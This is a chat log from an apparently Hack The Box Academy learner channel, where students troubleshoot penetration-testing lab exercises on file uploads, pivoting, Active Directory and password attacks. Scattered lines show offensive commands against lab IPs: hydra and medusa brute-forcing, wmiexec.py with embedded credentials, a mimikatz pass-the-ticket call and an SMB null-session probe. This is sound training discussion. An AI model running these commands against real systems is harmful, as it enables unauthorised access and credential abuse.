i have a question regarding Skills Assessment - File Upload Attacks module. i got the ||upload.php|| file, in which the file gets ||renamed before storing|| with this style: ||ymd|| which should mean ||250330|| right ?

complete filename would be: ||250330_name|| but i can't get that file

but cant find the file under the upload directory ||user_feedback_submissions||

gray yacht
stuck zodiac
#

In the Live Engagement for host one, has anyone tried the 2nd upload vulnerability suggested in the hints?

steel coral
#

sorry to ask maybe I'm not that updated but how do I access doxbin?

cloud urchin
compact halo
#

Same issue again with this module. Can't log in even though i waited for 10 minutes instead of the2 to 3 the module says.

cloud urchin
compact halo
#

I am giong to wait for about 20 minuts this time and maybe it'll work, lol

cloud urchin
#

try removing the password from your connection command

#

and the -p argument entirely

#

then remote in and type the password into the password field

compact halo
#

same result. I tried that last time i had this issue and it didn't work.

#

I might need to go to next section and double back later.

cloud urchin
#

try it again but remove the prefix from the username

compact halo
#

ok

compact halo
#

I even tried with the local user even though it's supposed to be domain (just for kicks)

gray yacht
cloud urchin
#

Good call r1cky

compact halo
#

Good catch. My bad. But still no login

cloud urchin
#

that's not how you select the port with xfreerdp iirc

#

try /port:

compact halo
cloud urchin
#

weird i've never done that, man shows /p:

compact halo
#

Still no log in

#

I already reboot my system and reset the vpn.

waxen totem
#

not sure that port is an argument I think it means to add the port after the colon in the /v parameter

compact halo
waxen totem
compact halo
waxen totem
#

o mb ๐Ÿ˜…

cloud urchin
#

well you're getting connection reset by peer error, not wrong username/pass

cloud urchin
#

your latest pic

compact halo
#

I'll probably just go ahead and double back. Maybe it'll feel sorry fo rme and work, lol

cloud urchin
#

I just tested, works fine for me with xfreerdp3

compact halo
#

not so sure what i am doing wrong.

spiral spoke
# fierce stream Hey, I've put in a lot of time this past year into leveling up my pentesting ski...

I think is your way if thinking, instead of rush all the modules needed or retired machines, have fun! what if I do this? what if? if I write this in a different way, be creative, be different, how this service works? some think interesting? write a python or bash script which automatize the vulnerability, if you dont know how ask chatgpt, ask why to every thing that you don't understant, have fun with hacking hugthebox

severe inlet
#

sorry for the question but is there a module in HTB that teaches about the tool "ligolo"?

gray yacht
waxen totem
ocean night
#

Please don't post flat out solutions like that.

#

Sick of saying it

#

..so will get AI to code a solution warning bot

#

๐Ÿคฃ

severe inlet
#

Really hope they will teach it soon since i learn the most from HTB

compact halo
waxen totem
ocean night
#

I'd advise Googling the error codes you are receiving, there's a very particular reason why it is failing

compact halo
#

This will be my 5th reset. I will reset and wait for about 15 minutes while reading through the next section

severe inlet
gray yacht
# ocean night Please don't post flat out solutions like that.

If you are referring to what I posted, I didn't mean to spoil anything and figured since that is what the section provides you to login, i.e. similar to SSH into the target with htb-student... I didn't think there was any harm. Regardless I will ensure to go to DMs.

ocean night
#

Thank you.

#

If it's over Tier 0, pasting module content, whether part of the solution or sections, it's best to err on the side of caution and go to DM

waxen totem
gray yacht
indigo cargo
#

On the footprinting module medium, i have rdped and fount the important file but i dont see how i can use it? i have tried to do it for the db and its not correct and i cant even enter the @ sign in a "run as administrator" field

waxen totem
indigo cargo
harsh gorge
waxen totem
waxen totem
cursive eagle
#

guys who did the CBBH, im in the Burp Intruder secition and my Burp has been running for too long how do I solve this

  • 2 Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag.
indigo cargo
#

you mean the sql server?

cursive eagle
#

it just caught a blank page of index.html

indigo cargo
#

The password doesnt work for the sql server tho

#

maybe im just missing something obvious

calm swan
#

hello there,
is there anyone (in the administration or others) who could check my report/documentation of my pentest assignment? I want to learn how to write a documentation but I don't know who can I ask to check if it's correct or is it missing some important aspects.

#

oh I just found the Documentation and Reporting module...
Imo it should be at the beginning of the CPTS path not at the end so ppl can already write more "professional" reports.

waxen totem
indigo cargo
#

alright i got it

#

i cant type @ for some reason in that admin menu

#

i found out that using a virtual keyboard was the solution by looking through the comments here in discord

lusty thicket
#

full of nothing

harsh gorge
lusty thicket
calm swan
severe inlet
#

since burp without the subscription is really slow thought it would be better to use something else

rustic sage
#

What's the difference between the Introduction to Networking Course and Network Foundations?

waxen totem
oblique flume
#

iโ€™m on the first question of the web proxies skills assessment and itโ€™s asking me to enable a button the the webpage /lucky.php

#

i found the line that disables it but itโ€™s only in the response not the request , how can i modify this ?

cloud urchin
#

I believe that module goes over how to capture responses in Burp too

rustic sage
#

Is anyone working on the Academy labs and canโ€™t connect to their target host? Iโ€™m having trouble RDP and it appears unusual.

oblique flume
#

i captured it

#

but the line is in the response

#

so i canโ€™t send the edited line back to the server

#

how do i go about this ?

cloud urchin
#

where can you send it to?

severe inlet
oblique flume
#

i can only send requests

waxen totem
severe inlet
#

used to take an hour on each section of Active Directory Enumeration & Attacks because of RDP with UDP vpn but when i switched it took way less to finish excersies

waxen totem
oblique flume
#

any ideas ?

waxen totem
cloud urchin
rustic sage
oblique flume
rustic sage
#

Iโ€™ve been ok rdp into these labs but they have now failed

oblique flume
#

thereโ€™s a string that says โ€œdisabledโ€ , iโ€™m able to delete it but that wonโ€™t go back to the server

waxen totem
rustic sage
#

Module/143/section/1420

waxen totem
rustic sage
#

Rdp

dense tree
#

Q's: I'm in infosec mod setup: been talking about downloading an installing a linux vm

rustic sage
#

Canโ€™t rdp Iโ€™ve been fine before

dense tree
#

Looking at Parrot OS

#

But why couldn't we run SeLinux cmd on Parrot?

oblique flume
waxen totem
rustic sage
#

Iโ€™d submit a ticket but all they will do is ask if itโ€™s down instead of diving deep into anything

oblique flume
#

i sent it to repeater to see what the response will say but it is still disabled

#

as well as when i forward it

dense tree
#

Q: is it possible to run SELinux on Parrot OS eventually? If I have admin right and download the packages?

oblique flume
#

has anyone here done the web proxies module yet ?

cloud urchin
balmy belfry
#

hi everyone I start with ccna course can you tell me the tobic i should know it very will to be professional

ocean night
balmy belfry
#

Ok thx

serene drum
#

So I am working on file upload attacks and in the non-blacklisted extensions section it tells you to use a certain extension, which in the lesson it works but when you try yourself it does not. I can try other extensions I am just confused why in the section it continues on as if it worked I guess

cloud urchin
#

the sections are not generally a 1:1 guide on the challenges at the end

#

you're supposed to apply what you've learned to the challenge

serene drum
#

Thank you for confirming that, I had a feeling and just wanted to be sure hunting for the answer myself is expected

calm swan
#

Need a hint regarding the Footprinting Lab - Medium; I discovered user and passwd for smtp but i don't know what can I do next...

#

cuz there's no smtp service on the target system and I dont have access on the smtp's machine

deft burrow
#

Im currently studying for the CPTS
In the Moving files modules i dont feel like i fully grasped the concept(i was able to move files but needed more umph i guess) and need additional resources.
Are there any boxes you can recommend that deal with file transfers and maybe requiring some base64 encoding to do so?

waxen totem
calm swan
#

I just found smth, gotta test it; BRB

calm swan
#

is it really medium lab? not hard? haha

foggy monolith
#

Curious why the hint for flag 1 of the Using CME skills assessment is so misleading. Asking you to enumerate a null session that doesn't exist.

#

Output:

$ nxc smb 10.129.204.182  -u "" -p ""
SMB         10.129.204.182  445    SQL01            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SQL01) (domain:INLANEFREIGHT.LOCAL) (signing:False) (SMBv1:False)
SMB         10.129.204.182  445    SQL01            [-] INLANEFREIGHT.LOCAL\: STATUS_ACCESS_DENIED

Yet the hint says to review the Enumerating Null Sessions section. So what null session is that hint talking about?

calm swan
#

@waxen totem sorry but need help... I found the creds for the database (creds are 1000% correct) but I get an error login failed for user sa

calm swan
#

using the same creds over 20 times I finally get different output:
A connection was successfully established with the server, but then an error occurred during the login process. -> No process is on the other end of the pipe

foggy monolith
foggy monolith
calm swan
#

nah, you GOTTA be kidding me; the problem was I didn't run the app as admin hahah

reef magnet
#

[Solved]
Hello everyone,

I'm currently working through the Windows Privilege Escalation module and encountered a possible issue in the Credential Hunting section.

In Question 2:

"Connect as the bob user and practice decrypting the credentials in the pass.xml file. Submit the contents of the flag.txt on the desktop once you are done."

I successfully connected as the bob user, decrypted the credentials, and retrieved the flag.txt file from the Desktop. However, even after submitting the correct content of flag.txt, the system still marks the answer as incorrect.

I also double-checked the result using "Show Solution", and my answer matches it exactly โ€” yet it still gets marked wrong. It seems like this might be a bug.

Could someone assist me with this issue? Iโ€™d really appreciate any help!

calm swan
#

maybe there's a SPACE somewhere?

#

at the beginning or the end

foggy monolith
quartz lagoon
#

hi, in the Web Server Pivoting with Rpivot section of the Pivoting, Tunneling, and Port Forwarding module, i can't seem to use "proxychains firefox" against the webserver because of DNS resolution problems, but i can still cURL it, does anyone know what causes this?

serene drum
#

So ive been hacking away at this for a bit and am finding myself stuck. I am currently on File upload attacks on the section 'Blacklist filters'.
I have set up burp to grab the request for an upload, fuzzed the endpoint and found a number of extensions that upload successfully but does not return a test hello world I did as the script when I sent it to the repeater to test each out.

I can't figure out what I am doing wrong.

quartz lagoon
#

i'm not too familiar with web attacks yet, isn't this the extension to set up proxies ?

#

if so, i guess i should use it to access the webserver directly from my browser right?

safe star
#

Yeah but I guess thats probably out of scope

#

I also used curl then

quartz lagoon
#

probably, i added it to my notes just in case but yeah curl works just fine

#

thanks

serene drum
#

I am stumped

foggy monolith
dark hedge
#

yep, as stated in the section

#

you gotta use chisel to connect to the network

quartz lagoon
#

im currently learning about pivoting and i heard pretty much everyone here praise ligolo so i was kinda happy knowing i would have an easy way to do all of that (but i guess not lol)

foggy monolith
foggy monolith
stiff aurora
#

hello, I'm working in "Active Directory Enumeration & Attacks", I have a issues to get the first question : What is the default Minimum password length when a new domain is created? (One number)
I'm confuse how solve it first question

ocean night
#

Because there's literally a section dedicated to what you asked

stiff aurora
#

yes, i did in the section explain it with smb, this server dont run smb also is debian server

ocean night
#

You're missing something in that section then

#

I'd advise reading back over the section ๐Ÿ™‚

#

Also... re-read the question

foggy monolith
serene drum
#

Hello everyone. I am currently trying to finish the File Upload Attacks module, type filters section. I have gotten as far as avoiding all the countermeasures, and my shell is uploaded. The only issue is I can't seem to extract the flag even though I bypassed the protections including MIME. Any pointers are welcome, going to keep trying in the mean time.

unique ether
#

Who can I dm here on file upload attacks assessment

#

Ah?

#

I cant leak

#

Here

real delta
calm swan
#

Just wanted to say that Footprinting Lab - Hard was awesome; fr, had so much fun โค๏ธ

#

it was a bit hard at the beginning cuz I forgot about existence of one important thing but after that is was awesome

high citrus
#

Hi im currently stuck in Password Attakcs Module, Network services, trying to brute force rdp, the other had no issue, but rdp with hydra doesn seem to find anyuthing, i've been waiting for 1 hour and a half

signal hound
#

Hi
When spraying passwords against AD
Do i need to use the CN name
Or the user principal name ?

ocean night
#

Which module is this relating to?

topaz scaffold
#

hi, can anyone help me with a problem
module: Attacking Web Applications with Ffuf
section: Page Fuzzing
Found the flag but when i submit it says that it is incorrect

storm elk
#

Try to check for spaces before/after the flag

topaz scaffold
#

no spaces ๐Ÿ˜ฆ

storm elk
#

dm me the flag and I will check ๐Ÿ™‚

high citrus
#

Hi im currently stuck in Password Attakcs Module, Network services, trying to brute force rdp, the other had no issue, but rdp with hydra doesn seem to find anything after compliting the brute force, i used the resources given in the right way, but still it doesnt work out.

rustic sage
#

anyone got the file upload attacks skill assessment and can help me ? when i intercept request, the request doesn't come from upload.php but from submit.php

how can i get an upload request to the upload.php ? I only need this to solve the assessment

uneven obsidian
#

I'm currently working through the File Transfer module and had a quick question. When it comes to transferring files with Python, is it better to install uploadserver on the target host to upload files, or should I use Pythonโ€™s built-in http.server (assuming Python is already installed) to avoid installing anything?

waxen totem
uneven obsidian
#

Thank you for the clarification !

sterile epoch
rustic sage
sterile epoch
#

can you share the module link??

gray yacht
rustic sage
#

THANK YOU

#

WHY IS THIS EVEN SO CONFUSING ? I THOUGHT SUBMITTING EQUALS UPLOADING

gray yacht
rustic sage
#

making sure you dont miss anything

stiff aurora
manic jasper
#

guys

#

i have a problem

small plume
#

How to write message on other channels๐Ÿง

manic jasper
#

in sqlmap skill assessment i am sure the flag is 100% correct but when i submit it says incorrect

bright coral
solar grove
#

" Exploit the SSRF vulnerability to identify an additional endpoint. Access that endpoint to obtain the flag. " In the question, I just asked for the admin.php address and gave the flag in a very ridiculous way, but the question tells us to find an additional endpoint and do a lot of processing.

Exploiting SSRF

dry falcon
#

even when i refresh many time it show the same.

solar grove
#

Some rooms have been updated but the questions are old questions, how do I fix this, is there a room reset?

worn matrix
#

can someone explain to me why we need to run responder with ntlmrelayx ? i mean can't we just run ntlmrelayx?

hazy notch
#

Hey, I don't know if you found the answer, but I had the same issue. Actually this is not the right attack path. Just use a much simpler one and remember that the server may offer additional authentication protocols than the one used by the intercepted client

lusty thicket
#

and you also have to consider the fact that ntlmrelayx doesn't store hashes unless a relay succeeds

#

whereas responder grabs those hashes anyway for cracking later, so even if relaying fails you'll walk away with something useful

proper umbra
#

Anyone having issues cant copy paste on the new xfreerdp3?

compact halo
#

try wrapping the entire think in one single quote Ex:Question: wmiexec.py 'inlanefreight.local/wley:"transporter@"@172.16.5.5" if i am understanding your question right?

compact halo
#

check your DM

worn matrix
alpine ingot
#

I have gone through all of the examples in the python hijacking in the linux privilege escalation and none of them work.
the sudo -l is for the particular script, not just python
There are no write privileges on the library
I cant set the PYTHONPATH to /tmp, due to only being able to run the mem script
None of the PYTHONPATH Listings have write access.

#

The 3 prereqs for python library hacking are not present on any of the stuff related to mem_status.py

#

Ok i figured it out but im really confused. This is the perms so why is it writable?
-rwSrwxr-x 1 root root 192 May 19 2023 mem_status.py

worn matrix
#

@lusty thicket so its like responder is feeding ntlmrelay?

lusty thicket
lusty thicket
worn matrix
#

we disable SMB on responder,so ntlmrelay will use port 445. aaaaaaa ok yeah i got it now.Thanks

#

funny thing is that i have finished the module,but still didnt comprehend this 100% ,nvm thanks

stiff aurora
#

hey guys I'm still working in What is the default Minimum password length when a new domain is created? (One number) from Enumerating & Retrieving Password Policies

#

but I can't find the default Minimum password length when a new domain is created

gray yacht
stiff aurora
#

that was inside the content information

compact halo
#

need some assistance on on Unconstrained delegation -Users (Kerberos Attacks)

winged gate
#

hello guys i'm on active directory module, i'm stuck on that question in the privilege acces page can u help me pls ? What other user in the domain has CanPSRemote rights to a host?

i find nothing ...

faint rampart
winged gate
faint rampart
# winged gate omggg it works !!! thank you so much bro.. but how can i know how to build this ...

You're welcome!
Its a long ass explanation, its basically a relationship query between 2 entities, (a user and a computer) and the relationship is who can psremote, so it puts the result in a variable p1 for users and puts the results for users in p2 and checks who can access what and finally returns p2 as the output in the graph, there are other variables serving that represent entities/AD objects

#

Just pass it to ChatGPT for a better explanation, its quite interesting. (this is from the module btw)

wooden pendant
#

I can help if you don't mind,you can kindly inbox me I can be of help

faint rampart
#

You have a colon included in the name for "inlanefreight.local/wley:" remove that because its recognizing that as a character thats part of the name

#

lol thats my point exactly wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5 look at it and compare you have a colon included in the username in quotes

faint rampart
#

No, you tried multiple commands, and in the ones I noticed the quotes werent even, I'm just gonna grab glasses now lmao

#

course material is very correct lol I've done that module over 3x

#

wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5 try this and if it fails just revert and try again, should work.

#

if it fails again exclude the password from your command and input it when it prompts for the password

round raven
#

Oh my god there is just too much content. How is it expected to be kept in mind.....

compact halo
#

gotta take good note and organize them

compact halo
#

Yes, i did forget the practice.

faint rampart
#

Ippsec would call it "Perfect practice"

round raven
#

I am revisiting AD basics and OH. MY. GOD.

#

its too much to read.

faint rampart
round raven
#

same, i am taking physical notes

#

as well as on Notion, but god damn...I need to put some of the content down or it will be too much for tiny brain to re-read from notes.

fathom pendant
#

@faint hill your screenshot contains spoilers [password] please redact and re-ask

faint hill
fathom pendant
#

Not to mention cracking that pw is part of an earlier section from what I recall

#

It's part of the module thats above tier 0. Ergo spoiler by default

#

Instead of arguing with that, just redact the pw and re-ask your question

#

See channel description

lime cosmos
#

i have problem on cpts path HTBS academy can i ask here ?

fathom pendant
#

Literally only one minor issue with your post, that's all

lime cosmos
#

ok , i can't uploud shell.php on the web server (it work with me before i just take a rest and back and now it not work), module getting started Nibbles - Initial Foothold

fathom pendant
#

can't upload
This isn't helpful without error messages or issues when you try and reach the shell.php page

lime cosmos
#

i upload it on nibbleblog - Plugins :: My image , http://<machine-ip>/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

fathom pendant
#

Did you adjust the payload to call back to your ip when you visit it?

#

Your ip being your tun0 ip

lime cosmos
#

yes before it was work and i upload multi shells . but now try to upload and it loading for 10 mints without any message respond

fathom pendant
#

? Did you visit where it was uploaded to?

#

The shell won't do anything until you visit it

lime cosmos
#

let me try

#

yes i try and i get 404 no found http://<machine-ip>/nibbleblog/content/private/plugins/my_image/image.php

fathom pendant
#

If you uploaded shell.php -> the file may be named shell.php

lime cosmos
fathom pendant
#

Then it didn't upload for whatever reason

lime cosmos
#

yes it not uploaded it keep loading .....and no respond

fathom pendant
#

But I suggest changing vpn regions

lime cosmos
#

lol let try my old crazy solution i think i will shutdown my laptop and try again

fathom pendant
#

When a reverse shell is run, it will continue trying to load the page

lime cosmos
fathom pendant
#

So that's not necessarily an indication of error, the page will load when you kill the shell

faint rampart
# fathom pendant <@751887597579796521> your screenshot contains spoilers [password] please redact...

Hey Marcie, perhaps that part of the module needs a little heads up incase anyone tries this in the future again or perhaps this message should be in erratum I dunno. - That user isnt an admin user in the domain hence he cant wmiexec or psexec onto the DC since he cant write to any admin shares, the module unit shows that it works which is why he was confused. I noticed this question has been asked a couple times here.

faint rampart
fathom pendant
#

I dislike how much the module overall just shows creds you had to uncover earlier on instead of relying on good notekeeping

#

I wasn't so much arguing with the error, just that it contains a password tbh. It's a valid issue that can be addressed

#

Unless I'm hallucinating and you didn't have to discover wley password in an earlier section

faint rampart
fathom pendant
faint rampart
tribal lark
lime cosmos
#

can i send a video here >

serene drum
#

day 2 of File Upload Attacks - Type Filters

#

here we go

serene drum
#

That looks like a scam

#

<@&861185840277487616>

hoary sleet
#

For the 1 on 1 help, do I just as a question & hope it get answer?

hoary sleet
gray yacht
fallow kernel
#

Yooo guys does anyone know why I get two different password hashes when dumping them from the SAM and SYSTEM files using secretdump.py versus samdump2?

serene drum
#

if I use spoiler tags is that enough to avoid spoiling or do I need to word my question to avoid details entirely? Been working a few days on the type filters section of File upload attacks.

gray yacht
serene drum
#

I know. That's why I am asking: Am I attempting to avoid people getting information they have not paid for or information they don't want spoiled?

gray yacht
#

So yeah, it doesn't nothing and it would still be considered spoiling.

serene drum
#

Okay that helps

gray yacht
gray yacht
serene drum
lime cosmos
rustic sage
#

got a small question

#

why does this not work all the time :
hydra -L username-anarchy -P passwords.txt ftp://127.0.0.1 -t 48

but medusa does:
medusa -M ftp -h 192.168.15.138 -u username-anarchy/ -P passwords.txt

is it because of the / or what

lusty thicket
rustic sage
#

both variants are possible

lusty thicket
#

have you tried without?

rustic sage
#

cringe a bot

#

for viewer boosting

rustic sage
fresh wedge
#

how come cant install sqsh on the pwnbox nor on my own native ParotOs?

#

how is a tool used in a module not accessable to the student?

waxen totem
#

isn't it already installed?

fresh wedge
#

no it is not

waxen totem
#

5699zeroshrug I don't use parrot and it works fine for me

fresh wedge
#

let me guess Kali has it built in?

#

or black arch?

waxen totem
#

I had to install it on my kali

fresh wedge
fathom pendant
acoustic owl
#

I had the same problem onceโ€ฆ

#

Perhaps there are newer versions today

odd pond
#

Hello, for Linux Privesc module Cron Job Abuse, it shows how to find the file to modify by searching for files with permissions, but where is the cronjob or scheduled task that is causing this to run every 2 minutes? I cannot seem to find anything

winter fractal
#

im needing hel p with a HTB question
[10:33 PM]
for the Linux Fundamentals course on HTB
[10:35 PM]
this is the question How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)

these were the commands i used
netstat -tuln | grep -v '127.0.0.1'

ss -tuln | grep -v '127.0.0.1'

#

โค๏ธ

waxen totem
winter fractal
#

and not getting the full list of listening services?

#

im still learning ๐Ÿ˜†

fathom pendant
winter fractal
fathom pendant
#

no you actually only excluded 127.0.0.1

#

but in your screenshot 127.0.0.53 is still in there

#

that number will drastically reduce the amount

#

i can count it in the screenshot even

#

the ips that are :: and ::: are ipv6 addresses

winter fractal
#

I GOT IT

#

THANK YOU! @fathom pendant

fathom pendant
#

<3

winter fractal
#

What i ddi was used 2 commands and was counting the addresses twice!!!!!

#

so it was 7

winter fractal
#

and counted bothhhh twice ๐Ÿคฃ thank you for your helpppp

fathom pendant
#

the important thing to note: the udp ones: those don't say LISTEN next to them

winter fractal
#

so i did more messing around

#

netstat -tln | grep -v tcp6 | grep -v 127.

#

i swear my brain just clicked

fathom pendant
#

:)

winter fractal
#

this is why i love learning

acoustic crane
#

can anybody suggest how to complete advanced file disclosure section of web attacks module? i have tried CDATA method and error method as given in the section but could not get the flag

sleek epoch
#

Thank you to the person/team who uploaded the android security module

#

Can we have in depth module for the same - writing exploits for android apps/iOS apps or low level android vulnerabilities/iOS security apps module

#

Would be great to have it

#

Or low level android kernel bugs (vr)

#

๐Ÿฅฐ๐Ÿฅฐ

acoustic crane
#

did anybody solve the question of cbbh web attacks module advanced file disclosure section? Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').

zenith token
#

Hello there, cany anyone help me with a nooby question?
I am currently working on the SQL injection module -> Database Enumeration.

And for some reasons, I can't wrap my head around what the difference between a "schemata" and a "database" should be...

acoustic crane
#

you may use chatgpt

#

@zenith token

zenith token
#

Already tried that, but it's still not intuitive for me. I guess I just spin up a database with docker and try to get some intuition by using it

waxen totem
acoustic crane
#

database is like a box and schemata is like a compartment inside the box

silk lagoon
#

For Exploiting SSTI - Jinja2: Exploit the SSTI vulnerability to obtain RCE and read the flag.

I am able to cat flag but it says it is still the wrong answer. Am I missing anything?

zenith token
# waxen totem You familiar with OOP? Think of schemas as classes for the tables in a database ...

Aaaaaaah!!!!! Yes, that makes a lot of sense. But just for my understanding:

Situation:

  1. I check with SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA for Schematas.
  2. I find schematas (NOT DATABASES) such as "dev" and "ilfreight"

Implication -> Based on the Schemata I know that there will be some databases with the structure defined in "dev" or "ilfreight".

Question:
Assuming it's similar like OOP and the "dev" would be the class. Would this mean, that it's not required for the actual database to be named "dev"?

For example "dev" as schemata, but "dev_1", "dev_2" and "dev_3" could be the actual databases (such as instances of a class in oop)?

waxen totem
zenith token
#

Hahahh, so in that case I will not make it more complicated than it needs to be. I see schemata dev -> I assume database dev ๐Ÿ˜›

#

Thank you very much for the help! highly appreciated โฃ๏ธ

acoustic crane
#

did anybody solve the question of cbbh web attacks module advanced file disclosure section? Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').

dry falcon
tranquil axle
#

you need to figure out if there is another extension that is executed as php file by the server and not blacklisted

dry falcon
tranquil axle
#

Probably best is to just try, if you use zaproxy or burpsuit you can configure a list of possible php extensions and try them all automatically and based on the server response size you can see if any of the extensions behave differently

frosty tide
#

Hello, I'm on File Transfer Module - Window:
I try follow the instruction. First I run below command on my host machine:
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

Then I try to run below command on the RDP window but it not working, but it accessible through window firefox:

dir \IP\DavWWWRoot

How do I get the result like in the module? Thank

dry falcon
tranquil axle
boreal vine
dry falcon
boreal vine
#

oh wait, i used scanner/http/robots_txt last time

#

nvm, silly mistake, thank anyway

pastel raven
#

hello everyone im super new to this and hope im posting in the right place

#

im trying to figure out how to get the url from a target and just cant seem to do that

#

this is the target 83.136.249.227:34959 and im trying to get a result looking like something.com in order to use the curl command thank you in advance !

compact jacinth
#

like for example if I do kerberos::ptt "C:\Users\Administrator.WIN01\Desktop[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
how do I know what kirbi to use if I would have like 10 of them?
would it matter?

waxen totem
burnt hill
#

Hello, I am doing the LIve engagement of the shell & payloads module "https://academy.hackthebox.com/module/115/section/1139", I am trying to get a shell of the host 1, I've tried different brute force attempts to login in Tomcat, but no success, I've checked the hint that is telling me the user and pass, but I would like to be able to brute force login without knowing the hint, any hint of how to get it? a special list?

gray yacht
nocturne pendant
#

Hey I'm very new to this and I'm having an issue in the windows fundamentals module.
I am on File System and the question is to find out which system user has full control over c:\users. The guide is to use icacls in order to find this out but try as I might I can't get this to work in either Bash or powershell. Any help would be greatly appreciated.

fading heart
gray yacht
fading heart
#

only that one. In the example they give they use that wordlist, and show results

gray yacht
gray yacht
fading heart
#

There are no targets to activate in that section

burnt hill
gray yacht
fading heart
gray yacht
fading heart
silent kayak
#

Hey everybody I'm looking for a partner or a mentor to teach me python I'm trying to learn how to code someone please help got everything I need but a partner or mentor

gray yacht
nocturne pendant
near orchid
#

i need to banner grab for this little exercise using netcat by making a connection to tcp port 22

#

could someone help me out

waxen totem
fathom pendant
#

nc ip port

#

also you don't have to connect to 22

#

as wild mentioned

gray yacht
fathom pendant
#

you're given an IP:port

waxen totem
#

[Solved...ish]
Need a sanity check on Pivoting... module, doing RDP and SOCKS tunneling with SocksOverRDP. My second RDP session always dies a couple seconds after it spawns(for second pivot that is)
[Solution:]
-# janky as f
Got past it by opening the flag as quickly as possible and taking a screenshot kek

Real solution: Check the performance tab on mstsc.exe, was mentioned in the section I'm just a goof who forgot about it

near orchid
#

i am sure everything is in the text alright but i am dutch and sometimes i dont fully understand

fathom pendant
#

the commands don't need to be translated

#

:)

near orchid
#
  • it is all new and very technical to me so i might not understand correct or miss something
fathom pendant
#

that's kinda the issue that gets lost in translation

#

is that tool names and such in the text can get translated and you miss the point

#

i also gave the basic command you just need to replace IP and port with the given IP and port

#

for future reference for people to help you; it's helpful to have the module and section name
module name being the overall thing "Getting Started; Enumeration with Nmap; Web Attacks"...
Section being like "Introduction"

near orchid
#

oke that is clear

#

allow me to impress you with my stupidity

waxen totem
near orchid
#

only the result that i got and the correct anwser are different

#

please endure my ignorance a bit longer hahha

rustic sage
#

I can't enumerate the AD users with PowerView or SharpHound collection - no LDAP connection?

gray yacht
rustic sage
gray yacht
flat estuary
#

I am facing difficulty with a CTF flag that requires finding a flag on the web page in the root directory "/". How can I achieve this using the ffuf tool?

#

Should I use path traversal wordlists for this?

rustic sage
#

it produces different answers because the version is not the same. you get the banner of the secure shell this way

rustic sage
fathom pendant
#

@near orchid you're not connecting to the right port

#

when you're given a public IP:port the ONLY scope is that IP:Port, any other port is off-limits for testing

indigo fulcrum
#

Hey peeps, anyone with some time to help with a module? I know I am doing the corect thing, as I am on the server but cant find a particular file ๐Ÿ˜ฆ

fathom pendant
#

without knowing the module and section name: no

indigo fulcrum
#

Didn't want to spoil it ๐Ÿ™‚